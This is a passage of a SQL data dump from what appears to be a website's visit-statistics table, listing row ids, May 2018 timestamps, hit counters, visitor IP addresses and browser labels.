98730,1,1,0,0,'54.36.148.70','other'),(245055,1526298859,2,2,0,0,'91.196.178.8','chrome'),(245056,1526298863,2,2,0,0,'91.196.178.169','chrome'),(245057,1526299014,2,2,0,0,'91.196.178.28','chrome'),(245058,1526299182,1,1,0,0,'54.36.148.208','other'),(245059,1526299382,1,1,0,0,'216.244.66.237','other'),(245060,1526299422,1,1,0,0,'94.178.2.175','chrome'),(245061,1526299423,1,1,0,0,'54.36.148.14','other'),(245062,1526299456,1,1,0,0,'54.36.148.16','other'),(245063,1526299539,1,1,0,0,'54.36.148.244','other'),(245064,1526299847,1,1,0,0,'54.36.148.221','other'),(245065,1526299972,1,1,0,0,'217.69.133.2','other'),(245066,1526300215,2,2,0,0,'92.112.125.243','chrome'),(245067,1526300487,1,1,0,0,'37.145.10.63','msie'),(245068,1526300603,1,1,0,0,'54.36.148.50','other'),(245069,1526300857,1,1,0,0,'54.36.149.47','other'),(245070,1526301196,1,0,1,0,'66.249.64.28',''),(245071,1526301659,1,1,0,0,'54.36.148.23','other'),(245072,1526301874,1,1,0,0,'54.36.148.227','other'),(245073,1526302029,1,1,0,0,'54.36.148.252','other'),(245074,1526302144,1,1,0,0,'54.36.149.63','other'),(245075,1526302188,2,2,0,0,'54.165.59.7','other'),(245076,1526302203,1,1,0,0,'54.36.149.21','other'),(245077,1526302319,1,0,1,0,'66.249.64.28',''),(245078,1526302675,1,1,0,0,'8.29.198.26','other'),(245079,1526302917,1,1,0,0,'54.36.148.117','other'),(245080,1526303108,1,1,0,0,'54.36.148.196','other'),(245081,1526303199,1,1,0,0,'194.44.228.77','chrome'),(245082,1526303249,1,1,0,0,'35.226.23.240','other'),(245083,1526303469,1,1,0,0,'54.36.149.83','other'),(245084,1526303680,1,1,0,0,'77.111.244.66','chrome'),(245085,1526303815,1,1,0,0,'54.36.148.130','other'),(245086,1526303911,1,1,0,0,'54.36.149.72','other'),(245087,1526303958,1,1,0,0,'95.84.138.22','msie'),(245088,1526303972,1,1,0,0,'54.165.59.7','other'),(245089,1526303986,1,1,0,0,'54.36.148.25','other'),(245090,1526304167,1,1,0,0,'54.36.148.40','other'),(245091,1526304300,1,1,0,0,'91.124.234.135','chrome'),(245092,1526304320,1,1,0,0,'54.36.148.176','other'),(245093,1526304457,1,1,0,0,'54.36.149.45','other'),(245094,1526304569,1,1,0,0,'54.36.148.11','other'),(245095,1526304801,1,1,0,0,'54.36.148.67','other'),(245096,1526305013,1,1,0,0,'207.46.13.106','other'),(245097,1526305065,1,1,0,0,'54.36.148.150','other'),(245098,1526305098,1,1,0,0,'66.249.64.30','chrome'),(245099,1526305298,1,1,0,0,'54.36.148.142','other'),(245100,1526305719,1,1,0,0,'54.36.148.107','other'),(245101,1526305950,1,1,0,0,'54.36.148.48','other'),(245102,1526306110,1,1,0,0,'94.179.28.40','chrome'),(245103,1526306514,1,1,0,0,'54.36.148.228','other'),(245104,1526306596,1,1,0,0,'54.36.149.101','other'),(245105,1526306606,1,1,0,0,'92.112.38.27','chrome'),(245106,1526306673,1,1,0,0,'216.244.66.237','other'),(245107,1526306731,1,1,0,0,'91.196.178.94','chrome'),(245108,1526306850,4,4,0,0,'91.196.178.169','chrome'),(245109,1526306907,1,1,0,0,'54.36.148.223','other'),(245110,1526307177,1,1,0,0,'54.36.148.110','other'),(245111,1526307396,1,1,0,0,'54.36.149.22','other'),(245112,1526307666,1,0,1,0,'66.249.64.30',''),(245113,1526307694,1,1,0,0,'8.29.198.26','other'),(245114,1526308436,1,1,0,0,'188.230.43.254','other'),(245115,1526308763,1,1,0,0,'91.211.135.105','chrome'),(245116,1526309120,1,1,0,0,'91.196.178.74','firefox'),(245117,1526310509,1,1,0,0,'188.230.43.254','other'),(245118,1526310678,1,1,0,0,'54.36.148.139','other'),(245119,1526310708,3,3,0,0,'91.196.178.58','chrome'),(245120,1526310739,1,1,0,0,'54.36.148.185','other'),(245121,1526311170,1,1,0,0,'54.36.148.67','other'),(245122,1526311305,1,1,0,0,'54.36.148.135','other'),(245123,1526311412,1,1,0,0,'54.36.148.230','other'),(245124,1526311908,1,1,0,0,'54.36.149.33','other'),(245125,1526311983,1,1,0,0,'54.36.149.74','other'),(245126,1526312067,3,3,0,0,'91.196.178.58','chrome'),(245127,1526312180,1,1,0,0,'54.36.148.124','other'),(245128,1526312496,2,2,0,0,'91.196.178.163','chrome'),(245129,1526312804,1,1,0,0,'207.46.13.123','other'),(245130,1526312883,1,1,0,0,'188.230.43.254','other'),(245131,1526312923,1,1,0,0,'54.36.148.152','other'),(245132,1526313021,1,1,0,0,'54.36.148.43','other'),(245133,1526313183,1,1,0,0,'207.46.13.239','other'),(245134,1526313188,2,2,0,0,'91.196.178.58','chrome'),(245135,1526313440,1,1,0,0,'54.36.149.12','other'),(245136,1526313519,1,1,0,0,'8.29.198.26','other'),(245137,1526313529,1,1,0,0,'54.36.148.22','other'),(245138,1526313616,1,1,0,0,'54.36.148.139','other'),(245139,1526313939,1,1,0,0,'54.36.148.40','other'),(245140,1526314115,1,1,0,0,'54.36.149.106','other'),(245141,1526314122,1,1,0,0,'195.24.65.25','other'),(245142,1526314186,1,1,0,0,'54.36.149.93','other'),(245143,1526314240,1,1,0,0,'54.36.148.20','other'),(245144,1526314409,2,2,0,0,'91.196.178.58','chrome'),(245145,1526314621,1,1,0,0,'54.36.148.146','other'),(245146,1526314837,1,1,0,0,'207.46.13.5','other'),(245147,1526314862,1,1,0,0,'54.36.149.60','other'),(245148,1526314865,1,1,0,0,'54.36.148.221','other'),(245149,1526315288,1,1,0,0,'188.230.43.254','other'),(245150,1526315311,1,0,1,0,'66.249.64.30',''),(245151,1526315769,1,1,0,0,'54.36.148.89','other'),(245152,1526315859,1,1,0,0,'207.46.13.123','other'),(245153,1526316150,1,1,0,0,'54.36.149.40','other'),(245154,1526316279,1,1,0,0,'54.36.148.231','other'),(245155,1526316493,1,1,0,0,'54.36.148.14','other'),(245156,1526316622,2,2,0,0,'91.196.178.58','chrome'),(245157,1526317114,1,1,0,0,'54.36.148.18','other'),(245158,1526317393,3,3,0,0,'87.250.224.46','other'),(245159,1526317394,1,1,0,0,'37.9.113.182','other'),(245160,1526317685,1,1,0,0,'188.230.43.254','other'),(245161,1526317722,1,1,0,0,'54.36.148.238','other'),(245162,1526317841,1,1,0,0,'54.36.149.74','other'),(245163,1526318081,1,1,0,0,'54.36.149.32','other'),(245164,1526318090,1,1,0,0,'54.36.148.26','other'),(245165,1526318418,1,1,0,0,'54.36.148.213','other'),(245166,1526318512,1,1,0,0,'8.29.198.25','other'),(245167,1526318566,1,1,0,0,'54.36.149.106','other'),(245168,1526318590,1,1,0,0,'54.36.148.10','other'),(245169,1526318729,1,0,1,0,'66.249.64.28',''),(245170,1526318790,1,1,0,0,'54.36.148.207','other'),(245171,1526318853,1,1,0,0,'141.8.142.74','other'),(245172,1526319207,1,1,0,0,'54.36.149.13','other'),(245173,1526319492,3,3,0,0,'91.196.178.58','chrome'),(245174,1526319544,1,1,0,0,'54.36.148.97','other'),(245175,1526319805,1,1,0,0,'54.36.148.101','other'),(245176,1526319844,1,1,0,0,'54.36.148.112','other'),(245177,1526319852,1,1,0,0,'54.36.149.92','other'),(245179,1526319931,1,0,1,0,'66.249.70.29',''),(245180,1526319967,1,1,0,0,'54.36.148.106','other'),(245181,1526320009,1,1,0,0,'54.36.148.22','other'),(245182,1526320171,1,1,0,0,'54.36.148.55','other'),(245183,1526320174,1,1,0,0,'54.36.148.246','other'),(245184,1526320212,1,1,0,0,'54.36.148.33','other'),(245185,1526320242,1,1,0,0,'46.161.9.39','firefox'),(245186,1526320289,2,2,0,0,'35.226.23.240','other'),(245187,1526320664,2,2,0,0,'207.154.235.134','chrome'),(245188,1526321006,1,1,0,0,'54.36.149.38','other'),(245189,1526321169,1,1,0,0,'54.36.148.234','other'),(245190,1526321605,1,1,0,0,'54.36.149.78','other'),(245191,1526321627,2,2,0,0,'91.196.178.102','firefox'),(245192,1526322013,1,1,0,0,'54.36.148.236','other'),(245193,1526322332,1,1,0,0,'54.36.148.40','other'),(245194,1526322453,2,2,0,0,'91.196.178.8','chrome'),(245195,1526322695,1,1,0,0,'54.36.148.227','other'),(245196,1526322801,1,1,0,0,'54.36.148.174','other'),(245197,1526323343,1,1,0,0,'54.36.149.95','other'),(245198,1526323662,1,1,0,0,'54.36.148.102','other'),(245199,1526323753,1,1,0,0,'54.36.148.170','other'),(245200,1526323846,1,1,0,0,'54.36.149.29','other'),(245201,1526324023,1,0,1,0,'66.249.64.29',''),(245202,1526324138,1,1,0,0,'54.36.148.76','other'),(245203,1526324149,1,1,0,0,'141.8.142.74','other'),(245204,1526324355,1,1,0,0,'8.29.198.26','other'),(245205,1526324735,1,1,0,0,'54.36.148.21','other'),(245206,1526324925,1,1,0,0,'212.115.253.135','chrome'),(245207,1526325120,1,1,0,0,'217.69.133.5','other'),(245208,1526325155,1,1,0,0,'54.36.148.23','other'),(245209,1526325199,1,1,0,0,'92.112.229.201','chrome'),(245210,1526325239,1,1,0,0,'54.36.148.119','other'),(245211,1526325414,1,1,0,0,'54.36.149.71','other'),(245212,1526325776,1,1,0,0,'206.189.114.59','firefox'),(245214,1526325895,1,1,0,0,'54.36.148.155','other'),(245215,1526326139,1,1,0,0,'54.36.148.151','other'),(245216,1526326288,1,1,0,0,'54.36.149.55','other'),(245217,1526326977,1,0,1,0,'66.249.69.41',''),(245218,1526327858,2,2,0,0,'37.73.209.207','chrome'),(245219,1526328011,1,0,1,0,'66.249.69.39',''),(245220,1526328026,1,1,0,0,'46.161.9.39','firefox'),(245221,1526328111,1,1,0,0,'216.244.66.237','other'),(245222,1526328162,3,3,0,0,'91.196.178.58','chrome'),(245223,1526329205,1,1,0,0,'212.115.253.135','chrome'),(245224,1526329347,1,1,0,0,'8.29.198.27','other'),(245225,1526329546,3,3,0,0,'91.196.178.58','chrome'),(245226,1526330594,1,1,0,0,'54.36.148.211','other'),(245227,1526330870,1,1,0,0,'207.46.13.239','other'),(245228,1526331171,1,0,1,0,'66.249.75.30',''),(245229,1526331222,1,1,0,0,'54.36.148.85','other'),(245230,1526331589,1,1,0,0,'54.36.149.75','other'),(245231,1526331692,1,1,0,0,'54.36.149.59','other'),(245232,1526331694,1,1,0,0,'54.36.148.205','other'),(245233,1526331759,2,2,0,0,'46.200.99.242','chrome'),(245234,1526331868,1,1,0,0,'54.36.148.119','other'),(245235,1526331876,1,1,0,0,'54.36.148.65','other'),(245236,1526331986,1,1,0,0,'54.36.148.106','other'),(245237,1526332026,1,0,1,0,'66.249.75.28',''),(245238,1526332043,1,1,0,0,'54.36.148.75','other'),(245239,1526332201,1,1,0,0,'54.36.149.105','other'),(245240,1526332448,1,1,0,0,'54.36.148.90','other'),(245241,1526332575,1,1,0,0,'54.36.148.231','other'),(245242,1526332975,1,1,0,0,'54.36.148.98','other'),(245243,1526333027,1,1,0,0,'66.249.69.35','chrome'),(245244,1526333282,1,1,0,0,'54.36.149.78','other'),(245245,1526333638,1,1,0,0,'54.36.149.99','other'),(245246,1526333642,1,1,0,0,'54.36.149.71','other'),(245247,1526333683,1,1,0,0,'54.36.148.95','other'),(245248,1526334190,1,1,0,0,'216.244.66.237','other'),(245249,1526334283,1,1,0,0,'54.36.148.211','other'),(245250,1526334403,1,0,1,0,'66.249.69.39',''),(245251,1526334407,1,1,0,0,'54.36.148.27','other'),(245252,1526334613,1,1,0,0,'54.36.149.95','other'),(245253,1526334686,1,1,0,0,'93.77.159.140','firefox'),(245254,1526334928,1,1,0,0,'54.36.149.86','other'),(245255,1526335096,1,1,0,0,'216.244.66.237','other'),(245256,1526335197,1,1,0,0,'8.29.198.26','other'),(245257,1526335321,1,1,0,0,'54.36.148.220','other'),(245258,1526335353,1,1,0,0,'54.36.148.157','other'),(245259,1526335471,1,1,0,0,'54.36.149.15','other'),(245260,1526335543,1,1,0,0,'37.53.204.206','chrome'),(245261,1526335608,1,1,0,0,'91.209.11.236','other'),(245262,1526335772,1,1,0,0,'54.36.148.141','other'),(245263,1526335781,1,1,0,0,'54.36.148.98','other'),(245264,1526335807,1,1,0,0,'54.36.148.17','other'),(245265,1526336115,1,0,1,0,'66.249.69.39',''),(245266,1526336131,1,1,0,0,'54.36.148.174','other'),(245267,1526336176,1,1,0,0,'66.249.69.35','chrome'),(245268,1526336215,1,1,0,0,'54.36.148.66','other'),(245269,1526336345,1,1,0,0,'54.36.148.107','other'),(245270,1526336405,1,1,0,0,'54.36.148.22','other'),(245271,1526336625,1,1,0,0,'54.36.148.190','other'),(245272,1526336925,1,1,0,0,'54.36.148.71','other'),(245273,1526337058,1,1,0,0,'54.36.148.154','other'),(245274,1526337073,1,1,0,0,'54.36.149.77','other'),(245275,1526338402,1,1,0,0,'54.36.149.62','other'),(245276,1526338480,1,1,0,0,'141.8.142.74','other'),(245277,1526338620,1,1,0,0,'54.36.149.3','other'),(245278,1526338663,1,1,0,0,'37.9.113.182','other'),(245279,1526338675,1,1,0,0,'54.36.148.26','other'),(245280,1526338756,1,1,0,0,'91.209.11.236','other'),(245281,1526338888,1,1,0,0,'54.36.148.204','other'),(245282,1526339331,1,1,0,0,'54.36.148.201','other'),(245283,1526339383,1,1,0,0,'54.36.148.197','other'),(245284,1526339830,1,0,1,0,'66.249.69.35',''),(245285,1526339982,1,1,0,0,'54.36.148.112','other'),(245286,1526340184,1,1,0,0,'8.29.198.25','other'),(245287,1526340307,1,1,0,0,'54.36.148.196','other'),(245288,1526340428,1,1,0,0,'54.36.148.235','other'),(245289,1526340460,1,1,0,0,'54.36.149.104','other'),(245290,1526340648,1,1,0,0,'54.36.148.135','other'),(245291,1526340885,2,0,2,0,'66.249.69.41',''),(245292,1526341118,1,1,0,0,'54.36.149.103','other'),(245293,1526341487,1,1,0,0,'54.36.148.218','other'),(245294,1526341550,1,1,0,0,'54.36.148.198','other'),(245295,1526341635,1,1,0,0,'54.36.148.104','other'),(245296,1526341659,1,1,0,0,'54.36.149.63','other'),(245297,1526341670,1,0,1,0,'66.249.75.28',''),(245298,1526342502,1,1,0,0,'54.36.149.17','other'),(245299,1526342520,1,1,0,0,'54.36.148.113','other'),(245300,1526342953,1,1,0,0,'54.36.148.36','other'),(245301,1526343127,1,1,0,0,'54.36.148.246','other'),(245302,1526343148,1,1,0,0,'54.36.148.51','other'),(245303,1526343301,1,1,0,0,'54.36.149.35','other'),(245304,1526343624,1,1,0,0,'54.36.149.30','other'),(245305,1526343809,1,1,0,0,'54.36.149.41','other'),(245306,1526343822,1,1,0,0,'54.36.149.77','other'),(245307,1526343867,1,1,0,0,'66.249.69.35','chrome'),(245308,1526344072,1,1,0,0,'141.8.132.22','other'),(245309,1526344189,1,1,0,0,'54.36.148.241','other'),(245310,1526344319,1,1,0,0,'54.36.148.108','other'),(245311,1526344336,1,1,0,0,'54.36.148.117','other'),(245312,1526344598,1,1,0,0,'54.36.148.73','other'),(245313,1526344772,1,1,0,0,'54.36.149.77','other'),(245314,1526344958,2,2,0,0,'178.154.171.88','other'),(245315,1526345406,1,1,0,0,'54.36.149.55','other'),(245316,1526345732,1,1,0,0,'54.36.148.65','other'),(245317,1526345733,1,1,0,0,'54.36.149.59','other'),(245318,1526345935,1,1,0,0,'54.36.148.85','other'),(245319,1526346043,1,1,0,0,'8.29.198.25','other'),(245320,1526346162,1,1,0,0,'54.36.148.183','other'),(245321,1526346283,1,1,0,0,'54.36.149.15','other'),(245322,1526346605,1,1,0,0,'54.36.148.76','other'),(245323,1526346992,1,1,0,0,'54.36.148.139','other'),(245324,1526347117,1,1,0,0,'54.36.149.60','other'),(245325,1526347206,1,1,0,0,'54.36.148.97','other'),(245326,1526347465,1,1,0,0,'54.36.148.240','other'),(245327,1526347600,1,1,0,0,'54.36.148.68','other'),(245328,1526347602,1,1,0,0,'54.36.148.106','other'),(245329,1526347648,1,1,0,0,'54.36.148.169','other'),(245330,1526347668,1,1,0,0,'54.36.149.50','other'),(245331,1526347915,1,1,0,0,'54.36.148.144','other'),(245332,1526347917,1,1,0,0,'54.36.149.40','other'),(245333,1526347968,1,1,0,0,'54.36.149.25','other'),(245334,1526348086,1,1,0,0,'54.36.149.106','other'),(245335,1526348243,1,1,0,0,'54.36.148.159','other'),(245336,1526348251,1,1,0,0,'54.36.148.83','other'),(245337,1526348270,1,1,0,0,'54.36.149.54','other'),(245338,1526348978,1,1,0,0,'54.36.148.207','other'),(245339,1526349259,1,1,0,0,'54.36.148.107','other'),(245340,1526349382,2,2,0,0,'141.8.142.74','other'),(245341,1526349556,1,1,0,0,'54.36.148.110','other'),(245342,1526349920,1,1,0,0,'54.36.149.29','other'),(245343,1526350301,1,1,0,0,'54.36.148.183','other'),(245344,1526350800,1,1,0,0,'54.36.149.63','other'),(245345,1526351017,1,1,0,0,'8.29.198.25','other'),(245346,1526351048,1,1,0,0,'54.36.149.73','other'),(245347,1526351101,1,1,0,0,'54.36.149.25','other'),(245348,1526351177,1,1,0,0,'54.36.148.206','other'),(245349,1526351250,1,1,0,0,'178.154.171.88','other'),(245350,1526351279,1,1,0,0,'141.8.142.74','other'),(245351,1526351412,1,1,0,0,'180.76.15.27','other'),(245352,1526351639,1,1,0,0,'207.46.13.5','other'),(245353,1526351826,6,6,0,0,'95.216.20.162','other'),(245354,1526351847,1,1,0,0,'217.69.133.2','other'),(245355,1526351856,1,1,0,0,'54.36.149.71','other'),(245356,1526351878,1,1,0,0,'54.36.148.125','other'),(245357,1526351991,2,2,0,0,'195.189.50.4','chrome'),(245358,1526352180,1,1,0,0,'54.36.148.62','other'),(245359,1526352270,1,1,0,0,'54.36.149.41','other'),(245360,1526352418,2,2,0,0,'95.213.141.126','opera'),(245361,1526352512,1,1,0,0,'54.36.149.21','other'),(245362,1526353309,1,1,0,0,'54.36.148.252','other'),(245363,1526353490,1,1,0,0,'54.36.149.60','other'),(245364,1526353672,1,1,0,0,'54.36.148.100','other'),(245365,1526353905,1,1,0,0,'54.36.148.168','other'),(245366,1526354181,1,1,0,0,'54.36.148.30','other'),(245367,1526354748,1,0,1,0,'66.249.69.39',''),(245368,1526354768,1,1,0,0,'54.36.148.17','other'),(245369,1526355024,1,1,0,0,'54.165.59.7','other'),(245370,1526355065,1,1,0,0,'216.244.66.237','other'),(245371,1526355131,1,1,0,0,'54.36.148.72','other'),(245372,1526355256,1,1,0,0,'193.106.30.99','firefox'),(245373,1526355451,1,1,0,0,'54.36.148.249','other'),(245374,1526355464,3,3,0,0,'91.196.178.58','chrome'),(245375,1526355796,1,1,0,0,'54.36.148.127','other'),(245376,1526355874,1,1,0,0,'178.154.171.88','other'),(245377,1526355976,1,1,0,0,'54.36.148.178','other'),(245378,1526356208,1,1,0,0,'54.36.148.166','other'),(245379,1526356385,1,1,0,0,'54.36.148.148','other'),(245380,1526356718,1,1,0,0,'54.36.148.131','other'),(245381,1526356771,1,1,0,0,'54.36.148.12','other'),(245382,1526356854,1,1,0,0,'54.36.148.251','other'),(245383,1526356883,1,1,0,0,'8.29.198.27','other'),(245384,1526356986,1,1,0,0,'54.36.148.22','other'),(245385,1526357585,1,1,0,0,'54.36.148.176','other'),(245386,1526358053,1,1,0,0,'54.36.149.32','other'),(245387,1526358082,1,1,0,0,'54.36.149.83','other'),(245388,1526358105,1,1,0,0,'217.69.134.176','other'),(245389,1526358301,1,1,0,0,'54.36.148.108','other'),(245390,1526358501,1,1,0,0,'54.36.148.136','other'),(245391,1526358997,1,1,0,0,'217.69.133.194','other'),(245392,1526359027,1,1,0,0,'54.36.148.82','other'),(245393,1526359868,1,1,0,0,'54.36.148.137','other'),(245394,1526359990,1,1,0,0,'54.36.148.134','other'),(245395,1526360286,1,1,0,0,'54.36.148.105','other'),(245396,1526360474,1,1,0,0,'54.36.148.88','other'),(245397,1526360623,1,1,0,0,'54.36.149.30','other'),(245398,1526360827,1,1,0,0,'54.36.149.57','other'),(245399,1526360970,1,1,0,0,'54.36.148.81','other'),(245400,1526361093,1,1,0,0,'54.36.149.86','other'),(245401,1526361130,1,1,0,0,'54.36.148.121','other'),(245402,1526361191,1,1,0,0,'54.36.148.149','other'),(245403,1526361468,2,2,0,0,'78.111.190.218','chrome'),(245404,1526361515,1,1,0,0,'54.36.148.61','other'),(245405,1526361693,1,1,0,0,'54.36.148.40','other'),(245406,1526361735,1,1,0,0,'54.36.148.72','other'),(245407,1526361776,1,1,0,0,'178.154.171.88','other'),(245408,1526361842,1,1,0,0,'8.29.198.27','other'),(245409,1526361941,1,1,0,0,'54.36.149.80','other'),(245410,1526361995,1,1,0,0,'54.36.149.55','other'),(245411,1526362027,1,1,0,0,'54.36.148.190','other'),(245412,1526362079,1,1,0,0,'54.36.148.59','other'),(245413,1526362249,1,1,0,0,'54.36.149.35','other'),(245414,1526362295,1,1,0,0,'54.36.148.117','other'),(245415,1526362387,2,2,0,0,'91.196.177.46','chrome'),(245416,1526362388,1,1,0,0,'46.201.250.174','chrome'),(245417,1526362441,1,1,0,0,'54.36.148.113','other'),(245418,1526362536,1,1,0,0,'54.36.149.7','other'),(245419,1526362595,1,1,0,0,'54.36.148.206','other'),(245420,1526362719,1,1,0,0,'195.10.210.70','chrome'),(245421,1526362938,1,1,0,0,'54.36.148.155','other'),(245422,1526363140,1,1,0,0,'91.124.182.170','firefox'),(245423,1526363451,1,1,0,0,'54.36.149.34','other'),(245424,1526363650,2,2,0,0,'37.115.83.117','chrome'),(245425,1526363659,2,2,0,0,'141.8.142.74','other'),(245426,1526363661,1,1,0,0,'207.46.13.5','other'),(245427,1526363684,1,1,0,0,'54.36.148.33','other'),(245428,1526363750,1,1,0,0,'54.36.148.222','other'),(245429,1526363941,1,1,0,0,'54.36.148.150','other'),(245430,1526364415,1,1,0,0,'54.36.149.68','other'),(245431,1526364420,1,1,0,0,'54.36.148.55','other'),(245432,1526364617,1,1,0,0,'95.132.49.185','firefox'),(245433,1526364620,2,2,0,0,'91.196.178.162','chrome'),(245434,1526364879,1,1,0,0,'54.36.148.154','other'),(245435,1526364936,1,1,0,0,'178.154.171.88','other'),(245436,1526365067,1,1,0,0,'54.36.148.90','other'),(245437,1526365325,1,1,0,0,'54.36.148.208','other'),(245438,1526365517,2,2,0,0,'91.196.178.94','chrome'),(245439,1526365602,1,1,0,0,'54.36.148.235','other'),(245440,1526365764,1,1,0,0,'91.233.48.203','chrome'),(245441,1526365834,1,1,0,0,'54.36.148.233','other'),(245442,1526365852,2,2,0,0,'91.196.178.93','chrome'),(245443,1526366014,1,1,0,0,'54.36.148.53','other'),(245444,1526366068,1,1,0,0,'77.93.41.218','chrome'),(245445,1526366150,1,1,0,0,'54.36.148.132','other'),(245446,1526366202,1,1,0,0,'54.36.149.3','other'),(245447,1526366204,2,2,0,0,'92.112.240.170','chrome'),(245448,1526366292,2,2,0,0,'91.196.178.57','chrome'),(245449,1526366307,1,1,0,0,'54.36.148.110','other'),(245450,1526366550,1,1,0,0,'35.226.23.240','other'),(245451,1526366618,1,1,0,0,'54.36.149.49','other'),(245452,1526366666,1,1,0,0,'54.36.148.40','other'),(245453,1526366689,1,1,0,0,'54.36.148.230','other'),(245454,1526366912,1,1,0,0,'216.244.66.237','other'),(245455,1526366930,2,2,0,0,'141.8.142.74','other'),(245456,1526367132,1,1,0,0,'54.36.148.74','other'),(245457,1526367203,1,1,0,0,'54.36.149.26','other'),(245458,1526367496,1,1,0,0,'92.113.30.134','chrome'),(245459,1526367721,1,1,0,0,'8.29.198.26','other'),(245460,1526367737,1,1,0,0,'54.36.148.69','other'),(245461,1526367778,1,1,0,0,'54.36.148.120','other'),(245462,1526367974,1,1,0,0,'54.36.148.252','other'),(245463,1526368000,1,1,0,0,'54.36.149.90','other'),(245464,1526368074,1,1,0,0,'91.196.178.102','chrome'),(245465,1526368707,1,1,0,0,'91.196.178.129','chrome'),(245466,1526368981,1,1,0,0,'54.36.148.222','other'),(245467,1526369138,1,1,0,0,'54.36.148.246','other'),(245468,1526369309,1,1,0,0,'54.36.148.106','other'),(245469,1526369346,1,1,0,0,'54.36.148.216','other'),(245470,1526369588,1,1,0,0,'54.36.148.123','other'),(245471,1526369695,1,1,0,0,'95.134.7.198','firefox'),(245472,1526369805,1,1,0,0,'178.154.171.88','other'),(245473,1526369806,1,1,0,0,'54.36.149.91','other'),(245474,1526369834,1,1,0,0,'54.36.148.220','other'),(245475,1526370143,1,1,0,0,'54.36.149.31','other'),(245476,1526370204,1,1,0,0,'54.36.148.124','other'),(245477,1526370684,1,1,0,0,'54.36.148.52','other'),(245478,1526370747,1,1,0,0,'54.36.149.99','other'),(245479,1526370794,7,7,0,0,'91.196.178.94','chrome'),(245480,1526370806,1,1,0,0,'141.8.142.74','other'),(245481,1526371156,1,1,0,0,'77.88.207.115','chrome'),(245482,1526371203,1,1,0,0,'54.36.149.44','other'),(245483,1526371252,1,1,0,0,'54.36.148.53','other'),(245484,1526371386,1,1,0,0,'37.52.23.10','chrome'),(245485,1526371685,1,1,0,0,'54.36.148.89','other'),(245486,1526372082,1,1,0,0,'46.201.250.174','other'),(245487,1526372101,1,1,0,0,'54.36.148.153','other'),(245488,1526372163,1,1,0,0,'54.36.149.18','other'),(245489,1526372430,2,2,0,0,'91.196.178.93','chrome'),(245490,1526372502,1,1,0,0,'54.36.148.215','other'),(245491,1526372658,1,1,0,0,'141.8.142.74','other'),(245492,1526372682,1,1,0,0,'8.29.198.25','other'),(245493,1526372773,1,1,0,0,'162.210.196.130','other'),(245494,1526372839,1,1,0,0,'54.36.148.192','other'),(245495,1526372862,1,0,1,0,'66.249.69.41',''),(245496,1526372891,1,1,0,0,'54.36.149.102','other'),(245497,1526372923,1,1,0,0,'54.36.148.51','other'),(245498,1526372961,1,1,0,0,'54.36.149.98','other'),(245499,1526373027,1,1,0,0,'54.36.148.114','other'),(245500,1526373169,1,1,0,0,'54.36.148.165','other'),(245501,1526373269,1,1,0,0,'54.36.148.31','other'),(245502,1526373734,1,1,0,0,'195.69.223.246','other'),(245503,1526373954,1,1,0,0,'91.196.177.46','chrome'),(245504,1526374054,1,1,0,0,'141.8.142.74','other'),(245505,1526374240,2,2,0,0,'54.165.59.7','other'),(245506,1526374427,1,1,0,0,'46.161.9.39','firefox'),(245507,1526374453,1,1,0,0,'95.28.49.3','msie'),(245508,1526374941,1,1,0,0,'54.36.148.245','other'),(245509,1526374967,1,1,0,0,'54.36.148.208','other'),(245510,1526375106,1,1,0,0,'180.76.15.25','other'),(245511,1526375280,1,1,0,0,'178.154.171.88','other'),(245512,1526375400,2,2,0,0,'91.196.178.93','chrome'),(245513,1526375415,1,0,1,0,'66.249.69.41',''),(245514,1526375456,1,1,0,0,'93.188.39.163','firefox'),(245515,1526375573,1,1,0,0,'91.196.178.135','firefox'),(245516,1526375640,1,1,0,0,'54.36.148.161','other'),(245517,1526375973,1,1,0,0,'54.36.148.130','other'),(245518,1526376192,1,1,0,0,'54.36.149.95','other'),(245519,1526376383,1,1,0,0,'54.36.148.255','other'),(245520,1526376394,1,1,0,0,'87.250.224.46','other'),(245521,1526376601,1,1,0,0,'54.36.148.192','other'),(245522,1526376738,1,1,0,0,'91.196.178.78','firefox'),(245523,1526376873,1,1,0,0,'54.36.148.76','other'),(245524,1526376889,1,1,0,0,'54.36.148.176','other'),(245525,1526376936,1,0,1,0,'66.249.69.39',''),(245526,1526377566,1,1,0,0,'54.36.149.90','other'),(245527,1526377574,1,1,0,0,'54.36.148.10','other'),(245528,1526377603,1,1,0,0,'54.36.148.67','other'),(245529,1526377739,1,1,0,0,'54.36.149.9','other'),(245530,1526377918,2,2,0,0,'54.165.59.7','other'),(245531,1526378135,1,1,0,0,'93.175.236.51','chrome'),(245532,1526378436,1,1,0,0,'37.55.58.114','chrome'),(245533,1526378500,1,1,0,0,'54.36.148.49','other'),(245534,1526378555,1,1,0,0,'8.29.198.25','other'),(245535,1526378695,1,1,0,0,'80.252.155.198','chrome'),(245536,1526378784,1,1,0,0,'54.36.148.138','other'),(245537,1526378927,1,1,0,0,'216.244.66.237','other'),(245538,1526379013,1,1,0,0,'54.36.149.48','other'),(245539,1526379266,1,1,0,0,'193.106.30.99','firefox'),(245540,1526379578,1,1,0,0,'178.154.171.88','other'),(245541,1526379813,1,1,0,0,'54.36.148.122','other'),(245542,1526380036,1,1,0,0,'54.36.149.18','other'),(245543,1526380297,1,1,0,0,'54.36.148.241','other'),(245544,1526380517,1,1,0,0,'217.69.133.3','other'),(245545,1526380744,1,1,0,0,'54.36.148.80','other'),(245546,1526381068,1,1,0,0,'54.36.148.250','other'),(245547,1526381385,3,3,0,0,'91.196.178.74','chrome'),(245548,1526381475,2,2,0,0,'146.185.157.155','chrome'),(245549,1526381634,1,1,0,0,'66.249.75.29','chrome'),(245550,1526381654,1,1,0,0,'66.249.69.41','chrome'),(245551,1526381693,1,1,0,0,'141.8.142.74','other'),(245552,1526381945,1,1,0,0,'207.46.13.5','other'),(245553,1526382480,1,1,0,0,'178.154.171.88','other'),(245554,1526383076,2,2,0,0,'91.196.178.94','chrome'),(245555,1526383450,1,1,0,0,'54.36.149.50','other'),(245556,1526383530,1,1,0,0,'8.29.198.25','other'),(245557,1526383593,1,1,0,0,'31.42.161.141','chrome'),(245558,1526383917,1,1,0,0,'54.36.148.80','other'),(245559,1526384117,1,1,0,0,'54.36.148.234','other'),(245560,1526384150,1,1,0,0,'91.196.177.46','chrome'),(245561,1526384269,1,1,0,0,'54.36.148.236','other'),(245562,1526384435,1,1,0,0,'5.1.29.106','chrome'),(245563,1526384535,1,1,0,0,'37.52.23.10','chrome'),(245564,1526384949,1,1,0,0,'54.36.149.86','other'),(245565,1526385063,1,1,0,0,'141.8.142.74','other'),(245566,1526385274,2,2,0,0,'91.196.178.9','chrome'),(245567,1526385365,2,2,0,0,'91.196.178.97','chrome'),(24